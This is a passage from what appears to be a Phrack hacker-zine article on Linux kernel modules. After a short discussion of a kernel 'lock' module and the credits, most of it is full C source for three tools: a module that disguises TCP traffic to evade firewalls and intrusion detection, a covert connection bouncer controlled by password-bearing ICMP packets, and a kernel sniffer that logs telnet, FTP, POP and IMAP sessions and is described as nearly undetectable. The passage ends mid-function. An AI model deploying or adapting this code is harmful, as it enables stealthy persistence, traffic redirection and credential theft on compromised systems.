+device (kernel memory can only be accessed with ring 0 privilege).  So
+without any kernel routine made available to the outside, the kernel is the
+only one that can touch it's own memory.  Readers should know that this is not
+something new.  Securelevels are (somewhat) implemented in kernels 2.0.x and
+do some cool stuff like not allowing writing directly to critical devices,
+such as /dev/kmem, /dev/mem, and /dev/hd*.  This was not implemented in 2.2.x,
+so it would be nice to have a module like this. When an administrator is
+through loading modules, and wants to leave the system just a bit more secure,
+he loads the 'lock' module, and presto, no more kernel harassing.  This must
+be of course be accompanied by other measures. I believe a real secure system
+should have this module installed and the kernel image file stored on a read
+only media, such as a floppy disk drive, and no boot loader such as lilo.
+You should also be  worried about securing the CMOS data. You just want to
+boot using the floppy.  Securing the CMOS data can be tricky on a rooted
+system as I noticed on a recent discussion on irc (liquidk, you intelligent
+bastard), but this is out of the scope of this article.  This idea could
+also be implemented directly in the kernel without using modules.  Mainly I
+would like to see a real secure levels implementation on 2.2.x :)
+
+
+---[  References
+
++ The Linux Kernel by David A. Rusling 
++ TCP/IP Illustrated, Volume 1 by W. Richard Stevens (Addison Wesley)
++ Phrack Issue 52, article 18 (P52-18) by plaguez.
++ Windows 98 Unleashed by Stev...oh. no. wait, this can't be right... :-)
+
+
+----[  Acknowledgements
+
+Both the authors would like to thank to: 
++ HPT (http://www.hackers-pt.org) for being a bunch of idiots (hehe).
++ pmsac@toxyn.org for support and coming up with the idea for the 
+  kernel based sniffer.
++ LiquidK for coming up with the OTP concept and fucking up some of 
+  our seemingly 'invincible' concepts :)
++ All of you leet hackers from Portugal, you know who you are. 
+  The scene shall be one again!! :)
+
+
+----[  The Code: OTP
+
+<++> P55/Linux-lkm/OTP/otp.c !bf8d47e0
+/* 
+ * Obscure Transport Protocol
+ *
+ * Goal: Change TCP behavior to evade IDS and firewall policies.
+ *
+ * lifeline (c) 1999 
+ * <arai@hackers-pt.org>
+ *
+ * gcc -O6 -c otp.c -I/usr/src/linux/include
+ * insmod otp.o dev=eth0 ip=123.123.123.123
+ *
+ * In ip= use only numerical dotted ip's!!
+ * Btw, this is the ip of the other machine that also has the module.
+ *
+ * Load this module in both machines putting in the ip= argument each other's
+ * machine numerical dotted ip.
+ *
+ * Oh, and don't even think about flaming me if this fucks up your machine,
+ * it works fine on mine with kernel 2.2.5.
+ * This tool stands on its own. I'm not responsible for any damage caused by it.
+ *
+ * You will probably want to make some arrangements with the #define's below.
+ *
+ */
+
+#define MODULE
+#define __KERNEL__
+
+#include <linux/config.h>
+#include <linux/module.h>
+#include <linux/version.h>
+
+#include <linux/byteorder/generic.h>
+#include <linux/netdevice.h>
+#include <net/protocol.h>
+#include <net/pkt_sched.h>
+#include <net/tcp.h>
+#include <net/ip.h>
+#include <linux/if_ether.h>
+#include <linux/ip.h>
+#include <linux/tcp.h>
+#include <linux/skbuff.h>
+#include <linux/icmp.h>
+
+#include <linux/kernel.h>
+#include <linux/mm.h>
+#include <linux/file.h>
+#include <asm/uaccess.h>
+
+
+/* Define here if you want to swap ports also */
+#define	REALPORT	23 		/* port you which to communicate */
+#define FAKEPORT	80		/* port that appears on the wire */
+
+
+char *dev, *ip;
+MODULE_PARM(dev, "s"); 
+MODULE_PARM(ip, "s");
+struct device *d;
+
+struct packet_type otp_proto;
+
+__u32 in_aton(const char *);
+
+/* Packet Handler Function */
+int otp_func(struct sk_buff *skb, struct device *dv, struct packet_type *pt) {
+
+	unsigned long int magic_ip;
+    unsigned int fin = skb->h.th->fin; 
+	unsigned int syn = skb->h.th->syn;
+
+	magic_ip = in_aton(ip);
+
+	if ((skb->pkt_type == PACKET_HOST || skb->pkt_type == PACKET_OUTGOING)
+	&& (skb->nh.iph->saddr == magic_ip || skb->nh.iph->daddr == magic_ip)
+	&& (skb->h.th->source == FAKEPORT) || (skb->h.th->dest == FAKEPORT)) {
+
+		if (skb->h.th->source == FAKEPORT) skb->h.th->source = htons(REALPORT);
+		if (skb->h.th->dest == FAKEPORT) skb->h.th->dest = htons(REALPORT);
+
+		if (skb->h.th->fin == 1) {
+			skb->h.th->fin = 0;
+			skb->h.th->syn = 1;
+			goto bye;
+		}
+		if (skb->h.th->syn == 1) {
+			skb->h.th->fin = 1;
+			skb->h.th->syn = 0;			
+		}
+	}
+
+	bye:
+	kfree_skb(skb);
+    return 0;
+}
+
+/*
+ *      Convert an ASCII string to binary IP.
+ */
+
+__u32 in_aton(const char *str) {
+        unsigned long l;
+        unsigned int val;
+        int i;
+
+        l = 0;
+        for (i = 0; i < 4; i++) {
+                l <<= 8;
+                if (*str != '\0') {
+                        val = 0;
+                        while (*str != '\0' && *str != '.') {
+                                val *= 10;
+                                val += *str - '0';
+                                str++;
+                        }
+                        l |= val;
+                        if (*str != '\0')
+                                str++;
+                }
+        }
+        return(htonl(l));
+}
+
+int init_module() {
+
+	if(!ip) {
+		printk("Error: missing end-host ip.\n");
+		printk("Usage: insmod otp.o ip=x.x.x.x [dev=devname]\n\n");
+		return -ENXIO;
+	}		
+
+	if (dev) {
+		d = dev_get(dev);
+		if (!d) {
+			printk("Did not find device %s!\n", dev);
+			printk("Using all known devices...");
+		} 
+		else {
+			printk("Using device %s, ifindex: %i\n", 
+				dev, d->ifindex);
+			otp_proto.dev = d;
+		}
+	}
+	else
+		printk("Using all known devices(wildcarded)...\n");
+
+	otp_proto.type = htons(ETH_P_ALL); 
+
+    otp_proto.func = otp_func;
+    dev_add_pack(&otp_proto);
+
+	return(0);
+}
+
+void cleanup_module() {
+	dev_remove_pack(&otp_proto);
+    printk("OTP unloaded\n");
+}
+<-->
+
+<++> P55/Linux-lkm/Bouncer/brules.c !677bd859
+/*
+ * Kernel Bouncer - Rules Client
+ * brules.c
+ *
+ * lifeline|arai (c) 1999 
+ * arai@hackers-pt.org
+ *
+ * Btw, needs libnet (http://www.packetfactory.net/libnet).
+ * Be sure to use 0.99d or later or this won't work due to a bug in previous versions.
+ *
+ * Compile: gcc brules.c -lnet -o brules
+ * Usage: ./brules srcaddr dstaddr password srcaddr-rule dstaddr-rule dstport-rule protocol-rule
+ * 
+ * srcaddr - source address
+ * dstaddr - destination adress (host with the bouncer loaded)
+ * password - magic string for authentication with module
+ * srcaddr-rule - source address of new bouncing rule
+ * dstaddr-rule - destination address of new bouncing rule
+ * dstport-rule - destination port of new bouncing rule
+ * protocol-rule - protocol of new bouncing rule (tcp, udp or icmp), 0 deletes all existing rules
+ *
+ * Example: 
+ * # ./brules 195.138.10.10 host.domain.com lifeline 192.10.10.10 202.10.10.10 23 tcp
+ *
+ * This well tell 'host.domain.com' to redirect all connections to port 23
+ * from '192.10.10.10', using TCP as the transport protocol, to the same port,
+ * using the same protocol, of host '202.10.10.10'.
+ * Of course, host.domain.com has to be with the module loaded. 
+ *
+ *  Copyright (c) 1999 lifeline <arai@hackers-pt.org>
+ *  All rights reserved.
+ *
+ */
+
+#include <stdio.h>
+#include <libnet.h>
+
+#define MAGIC_STR argv[3]
+
+int main(int argc, char **argv) {
+
+	struct rule {
+		u_long	srcaddr, dstaddr;
+		u_char	protocol;
+		u_short	destp;
+		struct rule *next;
+	} *rules;	
+	
+    unsigned char *buf;
+    u_char *payload;
+    int c, sd, payload_s={0};
+
+	if (argc != 8) {	
+		printf("Kernel Bouncer - Rules Client\n");
+		printf("arai|lifeline (c) 1999\n\n");
+		printf("Thanks to Kossak for the original idea.\n");
+		printf("Usage: %s srcaddr dstaddr password srcaddr-rule dstaddr-rule dstport-rule protocol-rule\n", argv[0]);	
+		exit(0);
+	}
+
+	rules = (struct rule *)malloc(sizeof(struct rule));
+	rules->srcaddr = libnet_name_resolve(argv[4], 1);
+	rules->dstaddr = libnet_name_resolve(argv[5], 1);
+	rules->destp = htons(atoi(argv[6]));
+	rules->protocol = atoi(argv[7]);
+	if(strcmp(argv[7], "tcp")==0)rules->protocol = IPPROTO_TCP;
+	if(strcmp(argv[7], "udp")==0)rules->protocol = IPPROTO_UDP;
+	if(strcmp(argv[7], "icmp")==0)rules->protocol = IPPROTO_ICMP;
+	rules->next = 0;
+
+	payload = (u_char *)malloc(strlen(MAGIC_STR) + sizeof(struct rule));
+	memcpy(payload, MAGIC_STR, strlen(MAGIC_STR));
+	memcpy((struct rule *)(payload + strlen(MAGIC_STR)), rules, sizeof(struct rule));
+	payload_s = strlen(MAGIC_STR) + sizeof(struct rule);
+
+    buf = malloc(8 + IP_H + payload_s);
+	if((sd = open_raw_sock(IPPROTO_RAW)) == -1) {
+    	fprintf(stderr, "Cannot create socket\n");
+		exit(EXIT_FAILURE);
+    }	
+	
+    libnet_build_ip(8 + payload_s, 0, 440, 0, 64,
+			IPPROTO_ICMP, name_resolve(argv[1], 1), 
+			name_resolve(argv[2], 1), NULL, 0, buf);
+
+
+
+    build_icmp_echo(8, 0, 242, 55, payload, payload_s, buf + IP_H);
+
+    if(libnet_do_checksum(buf, IPPROTO_ICMP, 8 + payload_s) == -1) {
+    	fprintf(stderr, "Can't do checksum, packet may be invalid.\n");
+    }	
+  
+#ifdef DEBUG
+	printf("type -> %d\n", *(buf+20));
+	printf("code -> %d\n", *(buf+20+1));
+	printf("checksum -> %d\n", *(buf+20+2));
+#endif
+
+    c = write_ip(sd, buf, 8 + IP_H + payload_s);
+    if (c < 8 + IP_H + payload_s) {
+		fprintf(stderr, "Error writing packet.\n");
+		exit(EXIT_FAILURE);
+	}
+#ifdef DEBUG
+	printf("%s : %p\n", buf+28, buf+28);
+#endif
+	
+	printf("Kernel Bouncer - Rules Client\n");
+	printf("lifeline|arai (c) 1999\n\n");
+	printf("Rules packet sent to %s.\n", argv[2]);
+
+	free(rules);
+	free(payload);
+	free(buf);	
+}
+<-->
+<++> P55/Linux-lkm/Bouncer/bouncer.c !f3ea817c
+/*
+ * krnbouncer.c - A kernel based bouncer module
+ *
+ * by kossak
+ * kossak@hackers-pt.org || http://www.hackers-pt.org/kossak
+ *
+ * This file is licensed by the GNU General Public License.
+ *
+ * Tested on a 2.2.5 kernel. Should compile on others with minimum fuss.
+ * However, I'm not responsible for setting fire on your computer, loss of
+ * mental health, bla bla bla...
+ *
+ * CREDITS:	- Plaguez and Halflife for an excelent phrack article on
+ * 		  kernel modules.
+ *              - the kernel developers for a great job (no irony intended).
+ *
+ * USAGE: gcc -O2 -DDEBUG -c krnbouncer.c -I/usr/src/linux/include ;
+ *        insmod krnsniff.o [dev=<device>]
+ *
+ * TODO :	- manage to send a packet thru another device than the one 
+ *		  the packet is originating from (difficult, but not important)
+ *		- implement a timeout for the bounce rules
+ * 		- the rules should store a source port for checking the
+ *		  connection (important)
+ *		- turn this into a totally protocol independent IP based 
+ *		  bouncer (quite a challenge :))
+ *
+ * NOTE : don't try to use this module to bounce connections of different
+ * 	  types, such as bouncing packets from a ppp device to an ethernet
+ *	  device and vice-versa. That was not tested and may crash your
+ *	  machine.
+ */
+
+
+#define MODULE
+#define __KERNEL__
+
+#include <linux/config.h>
+#include <linux/module.h>
+#include <linux/version.h>
+
+#include <linux/byteorder/generic.h>
+#include <linux/netdevice.h>
+#include <net/protocol.h>
+#include <net/pkt_sched.h>
+#include <net/tcp.h>
+#include <linux/if_ether.h>
+#include <linux/ip.h>
+#include <linux/tcp.h>
+#include <linux/skbuff.h>
+#include <linux/icmp.h>
+
+#include <linux/kernel.h>
+#include <linux/mm.h>
+#include <linux/file.h>
+#include <asm/uaccess.h>
+
+#include <linux/time.h>
+
+#define DBGPRN1(X)		if (debug) printk(KERN_DEBUG X)
+#define DBGPRN2(X,Y)		if (debug) printk(KERN_DEBUG X, Y);
+#define DBGPRN3(X,Y,Z)  	if (debug) printk(KERN_DEBUG X, Y, Z);
+#define DBGPRN4(X,Y,Z,W)	if (debug) printk(KERN_DEBUG X, Y, Z, W);
+#define DBGPRN5(X,Y,Z,W,V)      if (debug) printk(KERN_DEBUG X, Y, Z, W, V);
+
+#define TRUE  -1
+#define FALSE  0
+
+#define MAXRULES 8			/* Max bouncing rules. */
+#define RULEPASS "kossak"
+
+
+/*
+#define SOURCEIP "a.b.c.d"
+#define DESTIP "e.f.g.h"
+*/
+
+/* global data */
+int debug, errno;
+
+struct rule {
+	__u32		source, dest;
+	__u8		proto;
+	__u16		destp; 		/* TCP and UDP only */
+	struct rule	*next;
+};
+
+/* this is a linked list */
+struct rule *first_rule;
+
+char *dev;
+MODULE_PARM(dev, "s");  /* gets the parameter dev=<devname> */
+struct device *d;
+
+struct packet_type bounce_proto;
+
+/* inicial function declarations */
+
+char *in_ntoa(__u32 in);
+__u32 in_aton(const char *str);
+int filter(struct sk_buff *);
+int m_strlen(char *);
+char *m_memcpy(char *, char *, int);
+int m_strcmp(char *, const char *);
+
+void process_pkt_in(struct sk_buff *);
+void bounce_and_send(struct sk_buff *, __u32 new_host);
+void clear_bounce_rules(void);
+void process_bounce_rule(struct rule *);
+
+
+/* our packet handler */
+int pkt_func(struct sk_buff *skb, struct device *dv, struct packet_type *pt) {
+
+	switch (skb->pkt_type) {
+		case PACKET_OUTGOING:
+			break;
+		case PACKET_HOST:
+			process_pkt_in(skb);
+			break;
+        	case PACKET_OTHERHOST:
+			break;
+		default:
+			kfree_skb(skb);
+			return 0;
+	}
+
+}
+
+
+void bounce_and_send(struct sk_buff *skb, __u32 new_host) {
+
+	struct tcphdr *th;
+	struct iphdr *iph;	
+	unsigned char dst_hw_addr[6];
+	unsigned short size;
+	int doff = 0;
+	int csum = 0;
+	int offset;
+
+	th = skb->h.th;
+	iph = skb->nh.iph;
+
+	skb->pkt_type = PACKET_OUTGOING; /* this packet is no longer for us */
+
+	/* we swap the ip addresses */
+	iph->saddr = skb->nh.iph->daddr;
+	iph->daddr = new_host;
+
+	size = ntohs(iph->tot_len) - (iph->ihl * 4);
+	doff = th->doff << 2;
+ 
+	/* calculate checksums again... bleh! :P */
+	skb->csum = 0;
+	csum = csum_partial(skb->h.raw + doff, size - doff, 0);
+	skb->csum = csum; /* data checksum */
+
+	th->check = 0;
+	th->check = csum_tcpudp_magic(
+		iph->saddr,
+		iph->daddr,
+		size,
+		iph->protocol,
+		csum_partial(skb->h.raw, doff, skb->csum)
+		); /* tcp or udp checksum */
+	ip_send_check(iph); /* ip checksum */
+
+	/* Now change the hardware MAC address and rebuild the hardware  
+	 * header. no need to allocate space in the skb, since we're dealing
+	 * with packets coming directly from the driver, with all fields 
+	 * complete.
+	 */
+	m_memcpy(dst_hw_addr, skb->mac.ethernet->h_source, 6);
+
+	if (skb->dev->hard_header)
+		skb->dev->hard_header(	skb, 
+					skb->dev, 
+					ntohs(skb->protocol), 
+					dst_hw_addr, 
+					skb->dev->dev_addr, 
+					skb->len);
+	else
+		DBGPRN1("no hardware-header build routine found\n");
+		/* send it anyway! lets hope nothing breaks :) */ 
+
+	dev_queue_xmit(skb_clone(skb, GFP_ATOMIC));
+}
+
+void process_bounce_rule(struct rule *ptr) {
+
+	struct rule *new_rule;
+
+	if ( ptr->proto == 0 ) {
+		DBGPRN1("protocol ID is 0, clearing bounce rules...\n");
+		clear_bounce_rules();
+	}
+	else {
+		new_rule = kmalloc(sizeof(struct rule), GFP_ATOMIC);
+		m_memcpy ((char *)new_rule,(char *)ptr, sizeof(struct rule));
+
+		new_rule->next = NULL; /* trust no one :) */
+
+		if (!first_rule) {
+			first_rule = new_rule; /* not 100% efficient here... */
+		}	
+		else {
+			ptr = first_rule;
+			while (ptr->next)
+				ptr = ptr->next;
+			ptr->next = new_rule;
+		}
+	}
+}
+
+/* this is untested code, dunno if kfree() works as advertised. */
+void clear_bounce_rules () {
+	struct rule *ptr;
+
+	while (first_rule) {
+		ptr = first_rule->next;
+		kfree(first_rule);
+		first_rule = ptr;
+	}	
+}
+
+
+void process_pkt_in(struct sk_buff *skb) {
+
+	char *data;
+	int i, datalen;
+	struct rule	*ptr;
+	__u32	host;
+
+	/* fix some pointers */
+	skb->h.raw = skb->nh.raw + skb->nh.iph->ihl*4;
+
+	/* This is an icmp packet, and may contain a bouncing rule for us. */
+	if (skb->nh.iph->protocol == IPPROTO_ICMP) {
+
+		if (skb->h.icmph->type != ICMP_ECHO) return;
+
+		data = (skb->h.raw) + sizeof(struct icmphdr); 
+
+		datalen = skb->len;
+
+		if (m_strcmp(data, RULEPASS)) {
+			DBGPRN1("Found a valid cookie, checking size...\n");
+			i = m_strlen(RULEPASS); 
+			if (sizeof(struct rule) < datalen - i) {
+				DBGPRN1("Valid size, editing rules...\n");
+				process_bounce_rule((struct rule *)(data+i));
+			} 
+			return;
+		}
+	}
+
+	ptr = first_rule;	
+
+	/* search the existing rules for this packet */
+	while (ptr) {
+		if (skb->nh.iph->protocol != ptr->proto) {
+			ptr = ptr->next;
+			continue;	
+		} 
+
+		if (skb->nh.iph->saddr == ptr->source
+			&& skb->h.th->dest == ptr->destp) { 
+			bounce_and_send(skb, ptr->dest);
+			return;
+		}
+
+                if (skb->nh.iph->saddr == ptr->dest
+                        && skb->h.th->source == ptr->destp) {
+			bounce_and_send(skb, ptr->source);
+			return;
+		}
+		ptr = ptr->next;
+	}
+
+}
+
+
+/* init_module */
+int init_module(void) {
+
+#ifdef DEBUG
+        debug = TRUE;
+#else
+        debug = FALSE;
+#endif
+
+	first_rule = NULL;
+
+/* this is for testing purposes only
+	first_rule = kmalloc(sizeof(struct rule), GFP_ATOMIC);
+	first_rule->source = in_aton(SOURCEIP);
+	first_rule->dest = in_aton(DESTIP);
+	first_rule->proto = IPPROTO_TCP;
+	first_rule->destp = htons(23);
+	first_rule->next = NULL;
+*/
+	if (dev) {
+		d = dev_get(dev);
+		if (!d) {
+			DBGPRN2("Did not find device %s!\n", dev);
+			DBGPRN1("Using all known devices...");
+		}
+		else {
+			DBGPRN3("Using device %s, ifindex: %i\n", 
+				dev, d->ifindex);
+			bounce_proto.dev = d;
+		}
+	}
+	else
+		DBGPRN1("Using all known devices...\n");
+
+	bounce_proto.type = htons(ETH_P_ALL);
+
+	/* this one just gets us incoming packets */
+/*	bounce_proto.type = htons(ETH_P_IP); */
+
+	bounce_proto.func = pkt_func;
+	dev_add_pack(&bounce_proto);
+
+	return(0);
+}
+
+void cleanup_module(void) {
+	dev_remove_pack(&bounce_proto);
+
+	DBGPRN1("Bouncer Unloaded\n");
+}
+
+
+/* boring yet useful functions follow... */
+
+/* Convert an ASCII string to binary IP. */
+__u32 in_aton(const char *str) {
+	unsigned long l;
+	unsigned int val;
+	int i;
+
+	l = 0;
+	for (i = 0; i < 4; i++) {
+		l <<= 8;
+		if (*str != '\0') {
+			val = 0;
+			while (*str != '\0' && *str != '.') {
+				val *= 10;
+				val += *str - '0';
+				str++;
+			}
+			l |= val;
+			if (*str != '\0')
+				str++;
+		}
+	}
+	return(htonl(l));
+}
+
+/* the other way around. */
+char *in_ntoa(__u32 in) {
+        static char buff[18];
+        char *p;
+
+        p = (char *) &in;
+        sprintf(buff, "%d.%d.%d.%d",
+                (p[0] & 255), (p[1] & 255), (p[2] & 255), (p[3] & 255));
+        return(buff);
+}
+
+int m_strcmp(char *trial, const char *correct) {
+	char *p;
+	const char *i;
+
+	p = trial;
+	i = correct;
+
+	while (*i) {
+		if (!p) return 0;
+		if (*p != *i) return 0;
+		p++;
+		i++;
+	}
+	return 1;
+}
+
+char *m_memcpy(char *dest, char *src, int size) {
+	char *i, *p;
+
+	p = dest;
+	i = src;
+
+	while (size) {
+		*p = *i;
+		i++;
+		p++;
+		size--;
+	}
+	return dest;
+}
+
+int m_strlen(char *ptr) {
+	int i = 0;
+	while (*ptr) {
+		ptr++;
+		i++;
+	}
+	return i;
+}
+
+/* EOF */
+<-->
+<++> P55/Linux-lkm/krnsniff/krnsniff.c !4adeadb3
+/* 
+ * krnsniff.c v0.1a - A kernel based sniffer module
+ * 
+ * by kossak
+ * kossak@hackers-pt.org || http://www.hackers-pt.org/kossak
+ * 
+ * This file is licensed by the GNU General Public License.
+ *
+ * Tested on a 2.2.5 kernel. Should compile on others with minimum fuss.
+ * However, I'm not responsible for setting fire on your computer, loss of
+ * mental health, bla bla bla...
+ * 
+ * CREDITS:	- Mike Edulla's ever popular linsniffer for some logging ideas.
+ *		- Plaguez and Halflife for an excelent phrack article on
+ *		  kernel modules.
+ *		- the kernel developers for a great job (no irony intended).
+ *
+ * USAGE: gcc -O2 -DDEBUG -c krnsniff.c -I/usr/src/linux/include ; 
+ *	  insmod krnsniff.o [dev=<device>]
+ *
+ * TODO :	- implement a timeout feature (IMPORTANT)
+ *	 	- better support for certain stupid ppp devices that don't set
+ *		  dev->hard_header_len correctly.
+ *		- Parallel logging (like linsniff.c, this thing is still just
+ *		  logging one connection at a time).
+ *		- fix strange kmem grows kernel bitchings (FIXED) ...i think
+ *		- store the logs in kernel memory and send them and clear them
+ *		  when a magic packet is sent.
+ *		- some weird shit happens in my LAN on incoming connections
+ *		  that fucks up the logs a bit, but this was not confirmed
+ *		  on other tests. It has to do with packets not increasing seq
+ *		  numbers, I think.
+ *		- This wasn't tested on a promisc system, but it should work
+ *		  without almost no modifications.
+ *
+ * NOTE: the purpose of this module is to expose the dangers of a rooted 
+ *       system. It is virtually impossible to detect, if used with a module
+ *       hidder.
+ *       This could also be developed further to become a simple and easy way 
+ *       to detect unauthorized network intrusions.
+ *
+ *       Oh, and script kiddies, don't read the FUCKING source, I hope you 
+ *       have shit loads of kernel faults and you lose all your 31337 0wn3d
+ *       s1t3z... grrr.
+ *
+ *       look at least at the LOGFILE define below before compiling.
+ */
+
+#define MODULE
+#define __KERNEL__
+
+#include <linux/config.h>
+#include <linux/module.h>
+#include <linux/version.h>
+
+#include <linux/byteorder/generic.h>
+#include <linux/netdevice.h>
+#include <net/protocol.h>
+#include <net/pkt_sched.h>
+#include <linux/if_ether.h>
+#include <linux/ip.h>
+#include <linux/tcp.h>
+#include <linux/skbuff.h>
+
+#include <linux/kernel.h>
+#include <linux/mm.h>
+#include <linux/file.h>
+#include <asm/uaccess.h>
+
+/* from a piece of pmsac's code... this is pratic :) */
+#define DBGPRN1(X)		if (debug) printk(KERN_DEBUG X)
+#define DBGPRN2(X,Y)		if (debug) printk(KERN_DEBUG X, Y);
+#define DBGPRN3(X,Y,Z)  	if (debug) printk(KERN_DEBUG X, Y, Z);
+#define DBGPRN4(X,Y,Z,W)	if (debug) printk(KERN_DEBUG X, Y, Z, W);
+#define DBGPRN5(X,Y,Z,W,V)      if (debug) printk(KERN_DEBUG X, Y, Z, W, V);
+
+#define TRUE  -1
+#define FALSE  0
+
+#define CAPTLEN		512	/* no. of bytes to log */
+
+/* do a 'touch LOGFILE' _before_ you load the module. */
+#define LOGFILE		"/tmp/sniff.log"
+
+/* global data */
+int debug, errno,
+    out_c, in_c, thru_c;	/* packet counters */
+
+struct t_data {
+	char		content[1500];
+	unsigned long	seq;
+	struct t_data	*next;
+};
+
+struct {
+	unsigned short  active;
+	unsigned long	saddr;
+	unsigned long	daddr;
+	unsigned short	sport;
+	unsigned short	dport;
+	unsigned long	totlen;
+	struct t_data	*data;
+} victim;
+
+char *dev;
+MODULE_PARM(dev, "s");  /* gets the parameter dev=<devname> */
+struct device *d;
+
+struct packet_type sniff_proto;
+
+/* inicial function declarations */
+char *in_ntoa(__u32 in);
+int filter(struct sk_buff *);
+void m_strncpy(char *, char *, int); 
+int m_strlen(char *);
+
+void start_victim(struct sk_buff *);
+void write_victim(struct sk_buff *);
+void end_victim(void);
+
+
+/* our packet handler */
+int pkt_func(struct sk_buff *skb, struct device *dv, struct packet_type *pt) {
+
+	/* fix some pointers */	
+	skb->h.raw = skb->nh.raw + skb->nh.iph->ihl*4;
+	skb->data = (unsigned char *)skb->h.raw + (skb->h.th->doff << 2); 
+	skb->len -= skb->nh.iph->ihl*4 + (skb->h.th->doff << 2);
+
+	switch (skb->pkt_type) {
+		case PACKET_OUTGOING:
+                	out_c++;
+			/* dont count with the hardware header 
+			 * since my stupid ippp device does not set this...
+			 * add more devices here.
+			 */
+			if(strstr(dv->name, "ppp")) 
+				skb->len -= 10;
+			else
+				skb->len -= dv->hard_header_len;
+			break;
+		case PACKET_HOST:
+			in_c++;
+			skb->len -= dv->hard_header_len;
+			break;
+		case PACKET_OTHERHOST:
+			thru_c++;
+			skb->len -= dv->hard_header_len;
+			break;
+		default:
+			kfree_skb(skb);
+			return 0;
+	}
+
+	if(filter(skb)) {
+		kfree_skb(skb);
+		return 0;
+	} 
+
+	/* rare case of NULL's in buffer contents */
+	if (m_strlen(skb->data) < skb->len)  
+		skb->len = m_strlen(skb->data);
+
+	if (skb->len > CAPTLEN - victim.totlen)
+		skb->len = CAPTLEN - victim.totlen;
+
+	if (skb->len)
+		write_victim(skb);
+
+	kfree_skb(skb);
+	return 0;
+}
+
+int filter (struct sk_buff *skb) {
+/* this is the filter function. it checks if the packet is worth logging */
+
+	struct t_data *ptr, *i;
+
+	int port = FALSE;
+
+	if (skb->nh.iph->protocol != IPPROTO_TCP)
+		return TRUE;
+
+	/* change to your favourite services here */
+	if 	(ntohs(skb->h.th->dest) == 21  ||
+		 ntohs(skb->h.th->dest) == 23  ||
+		 ntohs(skb->h.th->dest) == 110 ||
+		 ntohs(skb->h.th->dest) == 143 ||
+		 ntohs(skb->h.th->dest) == 513)
+			port = TRUE;
+
+	if (victim.active) {
+		if((skb->h.th->dest != victim.dport) ||
+		   (skb->h.th->source != victim.sport) ||
+		   (skb->nh.iph->saddr != victim.saddr) ||
+		   (skb->nh.iph->daddr != victim.daddr))
+			return TRUE;
+
+		if (victim.totlen >= CAPTLEN) {
+			
+			ptr = kmalloc(sizeof(struct t_data), GFP_ATOMIC);
+			if(!ptr) {
+				DBGPRN1("Out of memory\n");
+				end_victim();
+				return;
+			}
+			m_strncpy(ptr->content,
+				  "\n\n*** END : CAPLEN reached ---\n", 50);
+			ptr->next = NULL;
+
+			i = victim.data;
+			while(i->next)
+				i = i->next;
+			i->next = ptr;
+	
+			end_victim();
+			return TRUE;
+		}
+
+		if(skb->h.th->rst) {
+			ptr = kmalloc(sizeof(struct t_data), GFP_ATOMIC);
+			if(!ptr) {
+				DBGPRN1("Out of memory\n");
+				end_victim();
+				return;
+			}
+			m_strncpy(ptr->content,
+				  "\n\n*** END : RST caught ---\n", 50);
+			ptr->next = NULL;
+
+			i = victim.data;
+			while(i->next)
+				i = i->next;
+			i->next = ptr;
+
+			end_victim();
+			return TRUE;
+		}
+
+		if(skb->h.th->fin) {
+			ptr = kmalloc(sizeof(struct t_data), GFP_ATOMIC);
+			if(!ptr) {
+				DBGPRN1("Out of memory\n");
+				end_victim();
+				return;
+			}
+			m_strncpy(ptr->content,
+				  "\n\n*** END : FIN caught ---\n", 50);
+			ptr->next = NULL;
+
+			i = victim.data;
+			while(i->next)
+				i = i->next;
+			i->next = ptr;
+
+			end_victim();
+			return TRUE;
+		}
+	}
+	else {
+		if (port && skb->h.th->syn)
+			start_victim (skb);
+		else
+			return TRUE;
+	}
+
+	return FALSE;
+}
+
+void start_victim(struct sk_buff *skb) {
+
+	victim.active   = TRUE;
+	victim.saddr    = skb->nh.iph->saddr;
+	victim.daddr    = skb->nh.iph->daddr;
+	victim.sport    = skb->h.th->source;
+	victim.dport    = skb->h.th->dest;
+
+	victim.data = kmalloc(sizeof(struct t_data), GFP_ATOMIC);
+	/* we're a module, we can't afford to crash */
+	if(!victim.data) {
+		DBGPRN1("Out of memory\n");
+		end_victim();
+		return;
+	}
+	victim.data->seq = ntohl(skb->h.th->seq);
+	victim.data->next = NULL;
+
+	sprintf(victim.data->content, "\n\n*** [%s:%u] ---> [%s:%u]\n\n",
+		in_ntoa(victim.saddr),
+		ntohs(victim.sport),
+		in_ntoa(victim.daddr),
+		ntohs(victim.dport));
+
+	victim.totlen = m_strlen(victim.data->content);
+}
+
+
+void write_victim(struct sk_buff *skb) {
+
+	struct t_data *ptr, *i;
+
+	ptr = kmalloc(sizeof(struct t_data), GFP_ATOMIC);
+	if(!ptr) {
+		DBGPRN1("Out of memory\n");
+		end_victim();
+		return;
+	}
+
+	ptr->next = NULL;
+	ptr->seq = ntohl(skb->h.th->seq);
+	m_strncpy(ptr->content, skb->data, skb->len);
+
+	/*
+	 * putting it in the ordered list.
+	 */
+	i = victim.data;
+
+	if(ptr->seq < i->seq) {
+		/*
+		 * we caught a packet "younger" than the starting SYN.
+		 * Likely? no. Possible? yep. forget the bastard.
+		 */
+		kfree(ptr);
+		return;
+	}
+	/* actual ordering of tcp packets */
+	while (ptr->seq >= i->seq) {
+		if (ptr->seq == i->seq)
+			return; /* seq not incremented (no data) */
+		if (!i->next)
+			break; 
+		if (i->next->seq > ptr->seq)
+			break;
+		i = i->next;
+	}
+
+	ptr->next = i->next;
+	i->next = ptr;
+
+	victim.totlen += m_strlen(ptr->content);
+	return;
+}
+
+    
+void end_victim(void) {
+/*
+ * Im now saving the data to a file. This is mainly BSD's process accounting
+ * code, as seen in the kernel sources.
+ */
+	struct t_data *ptr;
+	struct file *file = NULL;
+	struct inode *inode;
+	mm_segment_t fs;
+
+	file = filp_open(LOGFILE, O_WRONLY|O_APPEND, 0);
+
+	if (IS_ERR(file)) {
+		errno = PTR_ERR(file);	
+		DBGPRN2("error %i\n", errno);
+		goto vic_end;
+	}
+ 
+	if (!S_ISREG(file->f_dentry->d_inode->i_mode)) {
+		fput(file);
+		goto vic_end;
+	}	
+
+	if (!file->f_op->write) {
+		fput(file);
+		goto vic_end;
+	}
+	
+	fs = get_fs();
+	set_fs(KERNEL_DS);
+	inode = file->f_dentry->d_inode;
+	down(&inode->i_sem);
+	while (victim.data) {
+
+		file->f_op->write(file, (char *)&victim.data->content,
+			m_strlen(victim.data->content), &file->f_pos);
+		ptr = victim.data;
+		victim.data = victim.data->next;
+		kfree(ptr);
+	}
+
+	up(&inode->i_sem);
+	set_fs(fs);
+
+	fput(file);
+
+	DBGPRN1("Entry saved\n");
+
+vic_end:
+	victim.saddr 	= 0;
